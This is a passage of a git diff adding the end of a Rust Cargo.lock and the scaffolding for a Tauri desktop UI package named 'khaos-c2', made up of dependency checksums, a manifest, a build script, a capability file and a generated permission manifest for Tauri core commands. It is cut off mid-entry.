0.2.1", + "windows-result 0.4.1", + "windows-strings 0.5.1", +] + +[[package]] +name = "windows-future" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fc6a41e98427b19fe4b73c550f060b59fa592d7d686537eebf9385621bfbad8e" +dependencies = [ + "windows-core 0.61.2", + "windows-link 0.1.3", + "windows-threading", +] + +[[package]] +name = "windows-implement" +version = "0.60.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "windows-interface" +version = "0.59.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "windows-link" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e6ad25900d524eaabdbbb96d20b4311e1e7ae1699af4fb28c17ae66c80d798a" + +[[package]] +name = "windows-link" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" + +[[package]] +name = "windows-numerics" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9150af68066c4c5c07ddc0ce30421554771e528bde427614c61038bc2c92c2b1" +dependencies = [ + "windows-core 0.61.2", + "windows-link 0.1.3", +] + +[[package]] +name = "windows-result" +version = "0.3.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "56f42bd332cc6c8eac5af113fc0c1fd6a8fd2aa08a0119358686e5160d0586c6" +dependencies = [ + "windows-link 0.1.3", +] + +[[package]] +name = "windows-result" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" +dependencies = [ + "windows-link 0.2.1", +] + +[[package]] +name = "windows-strings" +version = "0.4.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "56e6c93f3a0c3b36176cb1327a4958a0353d5d166c2a35cb268ace15e91d3b57" +dependencies = [ + "windows-link 0.1.3", +] + +[[package]] +name = "windows-strings" +version = "0.5.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" +dependencies = [ + "windows-link 0.2.1", +] + +[[package]] +name = "windows-sys" +version = "0.45.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "75283be5efb2831d37ea142365f009c02ec203cd29a3ebecbc093d52315b66d0" +dependencies = [ + "windows-targets 0.42.2", +] + +[[package]] +name = "windows-sys" +version = "0.59.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b" +dependencies = [ + "windows-targets 0.52.6", +] + +[[package]] +name = "windows-sys" +version = "0.61.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" +dependencies = [ + "windows-link 0.2.1", +] + +[[package]] +name = "windows-targets" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8e5180c00cd44c9b1c88adb3693291f1cd93605ded80c250a75d472756b4d071" +dependencies = [ + "windows_aarch64_gnullvm 0.42.2", + "windows_aarch64_msvc 0.42.2", + "windows_i686_gnu 0.42.2", + "windows_i686_msvc 0.42.2", + "windows_x86_64_gnu 0.42.2", + "windows_x86_64_gnullvm 0.42.2", + "windows_x86_64_msvc 0.42.2", +] + +[[package]] +name = "windows-targets" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973" +dependencies = [ + "windows_aarch64_gnullvm 0.52.6", + "windows_aarch64_msvc 0.52.6", + "windows_i686_gnu 0.52.6", + "windows_i686_gnullvm", + "windows_i686_msvc 0.52.6", + "windows_x86_64_gnu 0.52.6", + "windows_x86_64_gnullvm 0.52.6", + "windows_x86_64_msvc 0.52.6", +] + +[[package]] +name = "windows-threading" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b66463ad2e0ea3bbf808b7f1d371311c80e115c0b71d60efc142cafbcfb057a6" +dependencies = [ + "windows-link 0.1.3", +] + +[[package]] +name = "windows-version" +version = "0.1.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e4060a1da109b9d0326b7262c8e12c84df67cc0dbc9e33cf49e01ccc2eb63631" +dependencies = [ + "windows-link 0.2.1", +] + +[[package]] +name = "windows_aarch64_gnullvm" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "597a5118570b68bc08d8d59125332c54f1ba9d9adeedeef5b99b02ba2b0698f8" + +[[package]] +name = "windows_aarch64_gnullvm" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3" + +[[package]] +name = "windows_aarch64_msvc" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e08e8864a60f06ef0d0ff4ba04124db8b0fb3be5776a5cd47641e942e58c4d43" + +[[package]] +name = "windows_aarch64_msvc" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469" + +[[package]] +name = "windows_i686_gnu" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c61d927d8da41da96a81f029489353e68739737d3beca43145c8afec9a31a84f" + +[[package]] +name = "windows_i686_gnu" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b" + +[[package]] +name = "windows_i686_gnullvm" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66" + +[[package]] +name = "windows_i686_msvc" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "44d840b6ec649f480a41c8d80f9c65108b92d89345dd94027bfe06ac444d1060" + +[[package]] +name = "windows_i686_msvc" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66" + +[[package]] +name = "windows_x86_64_gnu" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8de912b8b8feb55c064867cf047dda097f92d51efad5b491dfb98f6bbb70cb36" + +[[package]] +name = "windows_x86_64_gnu" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78" + +[[package]] +name = "windows_x86_64_gnullvm" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "26d41b46a36d453748aedef1486d5c7a85db22e56aff34643984ea85514e94a3" + +[[package]] +name = "windows_x86_64_gnullvm" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d" + +[[package]] +name = "windows_x86_64_msvc" +version = "0.42.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9aec5da331524158c6d1a4ac0ab1541149c0b9505fde06423b02f5ef0106b9f0" + +[[package]] +name = "windows_x86_64_msvc" +version = "0.52.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" + +[[package]] +name = "winnow" +version = "0.5.40" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f593a95398737aeed53e489c785df13f3618e41dbcd6718c6addbf1395aa6876" +dependencies = [ + "memchr", +] + +[[package]] +name = "winnow" +version = "0.7.15" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "df79d97927682d2fd8adb29682d1140b343be4ac0f08fd68b7765d9c059d3945" + +[[package]] +name = "winnow" +version = "1.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2ee1708bef14716a11bae175f579062d4554d95be2c6829f518df847b7b3fdd0" +dependencies = [ + "memchr", +] + +[[package]] +name = "winreg" +version = "0.55.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb5a765337c50e9ec252c2069be9bf91c7df47afb103b642ba3a53bf8101be97" +dependencies = [ + "cfg-if", + "windows-sys 0.59.0", +] + +[[package]] +name = "wit-bindgen" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5" +dependencies = [ + "wit-bindgen-rust-macro", +] + +[[package]] +name = "wit-bindgen" +version = "0.57.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e" + +[[package]] +name = "wit-bindgen-core" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc" +dependencies = [ + "anyhow", + "heck 0.5.0", + "wit-parser", +] + +[[package]] +name = "wit-bindgen-rust" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21" +dependencies = [ + "anyhow", + "heck 0.5.0", + "indexmap 2.14.0", + "prettyplease", + "syn 2.0.117", + "wasm-metadata", + "wit-bindgen-core", + "wit-component", +] + +[[package]] +name = "wit-bindgen-rust-macro" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a" +dependencies = [ + "anyhow", + "prettyplease", + "proc-macro2", + "quote", + "syn 2.0.117", + "wit-bindgen-core", + "wit-bindgen-rust", +] + +[[package]] +name = "wit-component" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2" +dependencies = [ + "anyhow", + "bitflags 2.11.1", + "indexmap 2.14.0", + "log", + "serde", + "serde_derive", + "serde_json", + "wasm-encoder", + "wasm-metadata", + "wasmparser", + "wit-parser", +] + +[[package]] +name = "wit-parser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736" +dependencies = [ + "anyhow", + "id-arena", + "indexmap 2.14.0", + "log", + "semver", + "serde", + "serde_derive", + "serde_json", + "unicode-xid", + "wasmparser", +] + +[[package]] +name = "writeable" +version = "0.6.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1ffae5123b2d3fc086436f8834ae3ab053a283cfac8fe0a0b8eaae044768a4c4" + +[[package]] +name = "wry" +version = "0.55.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "186f9871daa55fd9c016578b810d149de58367113db7fb72b462d2323ce19514" +dependencies = [ + "base64 0.22.1", + "block2", + "cookie", + "crossbeam-channel", + "dirs", + "dom_query", + "dpi", + "dunce", + "gdkx11", + "gtk", + "http", + "javascriptcore-rs", + "jni", + "libc", + "ndk", + "objc2", + "objc2-app-kit", + "objc2-core-foundation", + "objc2-foundation", + "objc2-ui-kit", + "objc2-web-kit", + "once_cell", + "percent-encoding", + "raw-window-handle", + "sha2", + "soup3", + "tao-macros", + "thiserror 2.0.18", + "url", + "webkit2gtk", + "webkit2gtk-sys", + "webview2-com", + "windows", + "windows-core 0.61.2", + "windows-version", + "x11-dl", +] + +[[package]] +name = "x11" +version = "2.21.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "502da5464ccd04011667b11c435cb992822c2c0dbde1770c988480d312a0db2e" +dependencies = [ + "libc", + "pkg-config", +] + +[[package]] +name = "x11-dl" +version = "2.21.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38735924fedd5314a6e548792904ed8c6de6636285cb9fec04d5b1db85c1516f" +dependencies = [ + "libc", + "once_cell", + "pkg-config", +] + +[[package]] +name = "yoke" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "abe8c5fda708d9ca3df187cae8bfb9ceda00dd96231bed36e445a1a48e66f9ca" +dependencies = [ + "stable_deref_trait", + "yoke-derive", + "zerofrom", +] + +[[package]] +name = "yoke-derive" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "de844c262c8848816172cef550288e7dc6c7b7814b4ee56b3e1553f275f1858e" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", + "synstructure", +] + +[[package]] +name = "zerofrom" +version = "0.1.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0ec05a11813ea801ff6d75110ad09cd0824ddba17dfe17128ea0d5f68e6c5272" +dependencies = [ + "zerofrom-derive", +] + +[[package]] +name = "zerofrom-derive" +version = "0.1.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "11532158c46691caf0f2593ea8358fed6bbf68a0315e80aae9bd41fbade684a1" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", + "synstructure", +] + +[[package]] +name = "zerotrie" +version = "0.2.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f9152d31db0792fa83f70fb2f83148effb5c1f5b8c7686c3459e361d9bc20bf" +dependencies = [ + "displaydoc", + "yoke", + "zerofrom", +] + +[[package]] +name = "zerovec" +version = "0.11.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90f911cbc359ab6af17377d242225f4d75119aec87ea711a880987b18cd7b239" +dependencies = [ + "yoke", + "zerofrom", + "zerovec-derive", +] + +[[package]] +name = "zerovec-derive" +version = "0.11.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "625dc425cab0dca6dc3c3319506e6593dcb08a9f387ea3b284dbd52a92c40555" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "zmij" +version = "1.0.21" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/ui/src-tauri/Cargo.toml b/ui/src-tauri/Cargo.toml new file mode 100644 index 0000000..e97f3fb --- /dev/null +++ b/ui/src-tauri/Cargo.toml @@ -0,0 +1,20 @@ +[package] +name = "khaos-c2" +version = "1.0.0" +edition = "2021" + +[lib] +name = "khaos_c2_lib" + +[build-dependencies] +tauri-build = { version = "2", features = [] } + +[dependencies] +tauri = { version = "2", features = [] } +serde = { version = "1", features = ["derive"] } +serde_json = "1" +discord-rich-presence = "1" + +[profile.release] +opt-level = "s" +strip = true diff --git a/ui/src-tauri/build.rs b/ui/src-tauri/build.rs new file mode 100644 index 0000000..d860e1e --- /dev/null +++ b/ui/src-tauri/build.rs @@ -0,0 +1,3 @@ +fn main() { + tauri_build::build() +} diff --git a/ui/src-tauri/capabilities/default.json b/ui/src-tauri/capabilities/default.json new file mode 100644 index 0000000..4e7150c --- /dev/null +++ b/ui/src-tauri/capabilities/default.json @@ -0,0 +1,9 @@ +{ + "$schema": "../../node_modules/@tauri-apps/cli/schema/desktop-schema.json", + "identifier": "default", + "description": "Default capability — grants core permissions to the main window", + "windows": ["main"], + "permissions": [ + "core:default" + ] +} diff --git a/ui/src-tauri/gen/schemas/acl-manifests.json b/ui/src-tauri/gen/schemas/acl-manifests.json new file mode 100644 index 0000000..0eebfc4 --- /dev/null +++ b/ui/src-tauri/gen/schemas/acl-manifests.json @@ -0,0 +1 @@ +{"core":{"default_permission":{"identifier":"default","description":"Default core plugins set.","permissions":["core:path:default","core:event:default","core:window:default","core:webview:default","core:app:default","core:image:default","core:resources:default","core:menu:default","core:tray:default"]},"permissions":{},"permission_sets":{},"global_scope_schema":null},"core:app":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin.","permissions":["allow-version","allow-name","allow-tauri-version","allow-identifier","allow-bundle-type","allow-register-listener","allow-remove-listener","allow-supports-multiple-windows"]},"permissions":{"allow-app-hide":{"identifier":"allow-app-hide","description":"Enables the app_hide command without any pre-configured scope.","commands":{"allow":["app_hide"],"deny":[]}},"allow-app-show":{"identifier":"allow-app-show","description":"Enables the app_show command without any pre-configured scope.","commands":{"allow":["app_show"],"deny":[]}},"allow-bundle-type":{"identifier":"allow-bundle-type","description":"Enables the bundle_type command without any pre-configured scope.","commands":{"allow":["bundle_type"],"deny":[]}},"allow-default-window-icon":{"identifier":"allow-default-window-icon","description":"Enables the default_window_icon command without any pre-configured scope.","commands":{"allow":["default_window_icon"],"deny":[]}},"allow-fetch-data-store-identifiers":{"identifier":"allow-fetch-data-store-identifiers","description":"Enables the fetch_data_store_identifiers command without any pre-configured scope.","commands":{"allow":["fetch_data_store_identifiers"],"deny":[]}},"allow-identifier":{"identifier":"allow-identifier","description":"Enables the identifier command without any pre-configured scope.","commands":{"allow":["identifier"],"deny":[]}},"allow-name":{"identifier":"allow-name","description":"Enables the name command without any pre-configured scope.","commands":{"allow":["name"],"deny":[]}},"allow-register-listener":{"identifier":"allow-register-listener","description":"Enables the register_listener command without any pre-configured scope.","commands":{"allow":["register_listener"],"deny":[]}},"allow-remove-data-store":{"identifier":"allow-remove-data-store","description":"Enables the remove_data_store command without any pre-configured scope.","commands":{"allow":["remove_data_store"],"deny":[]}},"allow-remove-listener":{"identifier":"allow-remove-listener","description":"Enables the remove_listener command without any pre-configured scope.","commands":{"allow":["remove_listener"],"deny":[]}},"allow-set-app-theme":{"identifier":"allow-set-app-theme","description":"Enables the set_app_theme command without any pre-configured scope.","commands":{"allow":["set_app_theme"],"deny":[]}},"allow-set-dock-visibility":{"identifier":"allow-set-dock-visibility","description":"Enables the set_dock_visibility command without any pre-configured scope.","commands":{"allow":["set_dock_visibility"],"deny":[]}},"allow-supports-multiple-windows":{"identifier":"allow-supports-multiple-windows","description":"Enables the supports_multiple_windows command without any pre-configured scope.","commands":{"allow":["supports_multiple_windows"],"deny":[]}},"allow-tauri-version":{"identifier":"allow-tauri-version","description":"Enables the tauri_version command without any pre-configured scope.","commands":{"allow":["tauri_version"],"deny":[]}},"allow-version":{"identifier":"allow-version","description":"Enables the version command without any pre-configured scope.","commands":{"allow":["version"],"deny":[]}},"deny-app-hide":{"identifier":"deny-app-hide","description":"Denies the app_hide command without any pre-configured scope.","commands":{"allow":[],"deny":["app_hide"]}},"deny-app-show":{"identifier":"deny-app-show","description":"Denies the app_show command without any pre-configured scope.","commands":{"allow":[],"deny":["app_show"]}},"deny-bundle-type":{"identifier":"deny-bundle-type","description":"Denies the bundle_type command without any pre-configured scope.","commands":{"allow":[],"deny":["bundle_type"]}},"deny-default-window-icon":{"identifier":"deny-default-window-icon","description":"Denies the default_window_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["default_window_icon"]}},"deny-fetch-data-store-identifiers":{"identifier":"deny-fetch-data-store-identifiers","description":"Denies the fetch_data_store_identifiers command without any pre-configured scope.","commands":{"allow":[],"deny":["fetch_data_store_identifiers"]}},"deny-identifier":{"identifier":"deny-identifier","description":"Denies the identifier command without any pre-configured scope.","commands":{"allow":[],"deny":["identifier"]}},"deny-name":{"identifier":"deny-name","description":"Denies the name command without any pre-configured scope.","commands":{"allow":[],"deny":["name"]}},"deny-register-listener":{"identifier":"deny-register-listener","description":"Denies the register_listener command without any pre-configured scope.","commands":{"allow":[],"deny":["register_listener"]}},"deny-remove-data-store":{"identifier":"deny-remove-data-store","description":"Denies the remove_data_store command without any pre-configured scope.","commands":{"allow":[],"deny":["remove_data_store"]}},"deny-remove-listener":{"identifier":"deny-remove-listener","description":"Denies the remove_listener command without any pre-configured scope.","commands":{"allow":[],"deny":["remove_listener"]}},"deny-set-app-theme":{"identifier":"deny-set-app-theme","description":"Denies the set_app_theme command without any pre-configured scope.","commands":{"allow":[],"deny":["set_app_theme"]}},"deny-set-dock-visibility":{"identifier":"deny-set-dock-visibility","description":"Denies the set_dock_visibility command without any pre-configured scope.","commands":{"allow":[],"deny":["set_dock_visibility"]}},"deny-supports-multiple-windows":{"identifier":"deny-supports-multiple-windows","description":"Denies the supports_multiple_windows command without any pre-configured scope.","commands":{"allow":[],"deny":["supports_multiple_windows"]}},"deny-tauri-version":{"identifier":"deny-tauri-version","description":"Denies the tauri_version command without any pre-configured scope.","commands":{"allow":[],"deny":["tauri_version"]}},"deny-version":{"identifier":"deny-version","description":"Denies the version command without any pre-configured scope.","commands":{"allow":[],"deny":["version"]}}},"permission_sets":{},"global_scope_schema":null},"core:event":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-listen","allow-unlisten","allow-emit","allow-emit-to"]},"permissions":{"allow-emit":{"identifier":"allow-emit","description":"Enables the emit command without any pre-configured scope.","commands":{"allow":["emit"],"deny":[]}},"allow-emit-to":{"identifier":"allow-emit-to","description":"Enables the emit_to command without any pre-configured scope.","commands":{"allow":["emit_to"],"deny":[]}},"allow-listen":{"identifier":"allow-listen","description":"Enables the listen command without any pre-configured scope.","commands":{"allow":["listen"],"deny":[]}},"allow-unlisten":{"identifier":"allow-unlisten","description":"Enables the unlisten command without any pre-configured scope.","commands":{"allow":["unlisten"],"deny":[]}},"deny-emit":{"identifier":"deny-emit","description":"Denies the emit command without any pre-configured scope.","commands":{"allow":[],"deny":["emit"]}},"deny-emit-to":{"identifier":"deny-emit-to","description":"Denies the emit_to command without any pre-configured scope.","commands":{"allow":[],"deny":["emit_to"]}},"deny-listen":{"identifier":"deny-listen","description":"Denies the listen command without any pre-configured scope.","commands":{"allow":[],"deny":["listen"]}},"deny-unlisten":{"identifier":"deny-unlisten","description":"Denies the unlisten command without any pre-configured scope.","commands":{"allow":[],"deny":["unlisten"]}}},"permission_sets":{},"global_scope_schema":null},"core:image":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-new","allow-from-bytes","allow-from-path","allow-rgba","allow-size"]},"permissions":{"allow-from-bytes":{"identifier":"allow-from-bytes","description":"Enables the from_bytes command without any pre-configured scope.","commands":{"allow":["from_bytes"],"deny":[]}},"allow-from-path":{"identifier":"allow-from-path","description":"Enables the from_path command without any pre-configured scope.","commands":{"allow":["from_path"],"deny":[]}},"allow-new":{"identifier":"allow-new","description":"Enables the new command without any pre-configured scope.","commands":{"allow":["new"],"deny":[]}},"allow-rgba":{"identifier":"allow-rgba","description":"Enables the rgba command without any pre-configured scope.","commands":{"allow":["rgba"],"deny":[]}},"allow-size":{"identifier":"allow-size","description":"Enables the size command without any pre-configured scope.","commands":{"allow":["size"],"deny":[]}},"deny-from-bytes":{"identifier":"deny-from-bytes","description":"Denies the from_bytes command without any pre-configured scope.","commands":{"allow":[],"deny":["from_bytes"]}},"deny-from-path":{"identifier":"deny-from-path","description":"Denies the from_path command without any pre-configured scope.","commands":{"allow":[],"deny":["from_path"]}},"deny-new":{"identifier":"deny-new","description":"Denies the new command without any pre-configured scope.","commands":{"allow":[],"deny":["new"]}},"deny-rgba":{"identifier":"deny-rgba","description":"Denies the rgba command without any pre-configured scope.","commands":{"allow":[],"deny":["rgba"]}},"deny-size":{"identifier":"deny-size","description":"Denies the size command without any pre-configured scope.","commands":{"allow":[],"deny":["size"]}}},"permission_sets":{},"global_scope_schema":null},"core:menu":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-new","allow-append","allow-prepend","allow-insert","allow-remove","allow-remove-at","allow-items","allow-get","allow-popup","allow-create-default","allow-set-as-app-menu","allow-set-as-window-menu","allow-text","allow-set-text","allow-is-enabled","allow-set-enabled","allow-set-accelerator","allow-set-as-windows-menu-for-nsapp","allow-set-as-help-menu-for-nsapp","allow-is-checked","allow-set-checked","allow-set-icon"]},"permissions":{"allow-append":{"identifier":"allow-append","description":"Enables the append command without any pre-configured scope.","commands":{"allow":["append"],"deny":[]}},"allow-create-default":{"identifier":"allow-create-default","description":"Enables the create_default command without any pre-configured scope.","commands":{"allow":["create_default"],"deny":[]}},"allow-get":{"identifier":"allow-get","description":"Enables the get command without any pre-configured scope.","commands":{"allow":["get"],"deny":[]}},"allow-insert":{"identifier":"allow-insert","description":"Enables the insert command without any pre-configured scope.","commands":{"allow":["insert"],"deny":[]}},"allow-is-checked":{"identifier":"allow-is-checked","description":"Enables the is_checked command without any pre-configured scope.","commands":{"allow":["is_checked"],"deny":[]}},"allow-is-enabled":{"identifier":"allow-is-enabled","description":"Enables the is_enabled command without any pre-configured scope.","commands":{"allow":["is_enabled"],"deny":[]}},"allow-items":{"identifier":"allow-items","description":"Enables the items command without any pre-configured scope.","commands":{"allow":["items"],"deny":[]}},"allow-new":{"identifier":"allow-new","description":"Enables the new command without any pre-configured scope.","commands":{"allow":["new"],"deny":[]}},"allow-popup":{"identifier":"allow-popup","description":"Enables the popup command without any pre-configured scope.","commands":{"allow":["popup"],"deny":[]}},"allow-prepend":{"identifier":"allow-prepend","description":"Enables the prepend command without any pre-configured scope.","commands":{"allow":["prepend"],"deny":[]}},"allow-remove":{"identifier":"allow-remove","description":"Enables the remove command without any pre-configured scope.","commands":{"allow":["remove"],"deny":[]}},"allow-remove-at":{"identifier":"allow-remove-at","description":"Enables the remove_at command without any pre-configured scope.","commands":{"allow":["remove_at"],"deny":[]}},"allow-set-accelerator":{"identifier":"allow-set-accelerator","description":"Enables the set_accelerator command without any pre-configured scope.","commands":{"allow":["set_accelerator"],"deny":[]}},"allow-set-as-app-menu":{"identifier":"allow-set-as-app-menu","description":"Enables the set_as_app_menu command without any pre-configured scope.","commands":{"allow":["set_as_app_menu"],"deny":[]}},"allow-set-as-help-menu-for-nsapp":{"identifier":"allow-set-as-help-menu-for-nsapp","description":"Enables the set_as_help_menu_for_nsapp command without any pre-configured scope.","commands":{"allow":["set_as_help_menu_for_nsapp"],"deny":[]}},"allow-set-as-window-menu":{"identifier":"allow-set-as-window-menu","description":"Enables the set_as_window_menu command without any pre-configured scope.","commands":{"allow":["set_as_window_menu"],"deny":[]}},"allow-set-as-windows-menu-for-nsapp":{"identifier":"allow-set-as-windows-menu-for-nsapp","description":"Enables the set_as_windows_menu_for_nsapp command without any pre-configured scope.","commands":{"allow":["set_as_windows_menu_for_nsapp"],"deny":[]}},"allow-set-checked":{"identifier":"allow-set-checked","description":"Enables the set_checked command without any pre-configured scope.","commands":{"allow":["set_checked"],"deny":[]}},"allow-set-enabled":{"identifier":"allow-set-enabled","description":"Enables the set_enabled command without any pre-configured scope.","commands":{"allow":["set_enabled"],"deny":[]}},"allow-set-icon":{"identifier":"allow-set-icon","description":"Enables the set_icon command without any pre-configured scope.","commands":{"allow":["set_icon"],"deny":[]}},"allow-set-text":{"identifier":"allow-set-text","description":"Enables the set_text command without any pre-configured scope.","commands":{"allow":["set_text"],"deny":[]}},"allow-text":{"identifier":"allow-text","description":"Enables the text command without any pre-configured scope.","commands":{"allow":["text"],"deny":[]}},"deny-append":{"identifier":"deny-append","description":"Denies the append command without any pre-configured scope.","commands":{"allow":[],"deny":["append"]}},"deny-create-default":{"identifier":"deny-create-default","description":"Denies the create_default command without any pre-configured scope.","commands":{"allow":[],"deny":["create_default"]}},"deny-get":{"identifier":"deny-get","description":"Denies the get command without any pre-configured scope.","commands":{"allow":[],"deny":["get"]}},"deny-insert":{"identifier":"deny-insert","description":"Denies the insert command without any pre-configured scope.","commands":{"allow":[],"deny":["insert"]}},"deny-is-checked":{"identifier":"deny-is-checked","description":"Denies the is_checked command without any pre-configured scope.","commands":{"allow":[],"deny":["is_checked"]}},"deny-is-enabled":{"identifier":"deny-is-enabled","description":"Denies the is_enabled command without any pre-configured scope.","commands":{"allow":[],"deny":["is_enabled"]}},"deny-items":{"identifier":"deny-items","description":"Denies the items command without any pre-configured scope.","commands":{"allow":[],"deny":["items"]}},"deny-new":{"identifier":"deny-new","description":"Denies the new command without any pre-configured scope.","commands":{"allow":[],"deny":["new"]}},"deny-popup":{"identifier":"deny-popup","description":"Denies the popup command without any pre-configured scope.","commands":{"allow":[],"deny":["popup"]}},"deny-prepend":{"identifier":"deny-prepend","description":"Denies the prepend command without any pre-configured scope.","commands":{"allow":[],"deny":["prepend"]}},"deny-remove":{"identifier":"deny-remove","description":"Denies the remove command without any pre-configured scope.","commands":{"allow":[],"deny":["remove"]}},"deny-remove-at":{"identifier":"deny-remove-at","description":"Denies the remove_at command without any pre-configured scope.","commands":{"allow":[],"deny":["remove_at"]}},"deny-set-accelerator":{"identifier":"deny-set-accelerator","description":"Denies the set_accelerator command without any pre-configured scope.","commands":{"allow":[],"deny":["set_accelerator"]}},"deny-set-as-app-menu":{"identifier":"deny-set-as-app-menu","description":"Denies the set_as_app_menu command without any pre-configured scope.","commands":{"allow":[],"deny":["set_as_app_menu"]}},"deny-set-as-help-menu-for-nsapp":{"identifier":"deny-set-as-help-menu-for-nsapp","description":"Denies the set_as_help_menu_for_nsapp command without any pre-configured scope.","commands":{"allow":[],"deny":["set_as_help_menu_for_nsapp"]}},"deny-set-as-window-menu":{"identifier":"deny-set-as-window-menu","description":"Denies the set_as_window_menu command without any pre-configured 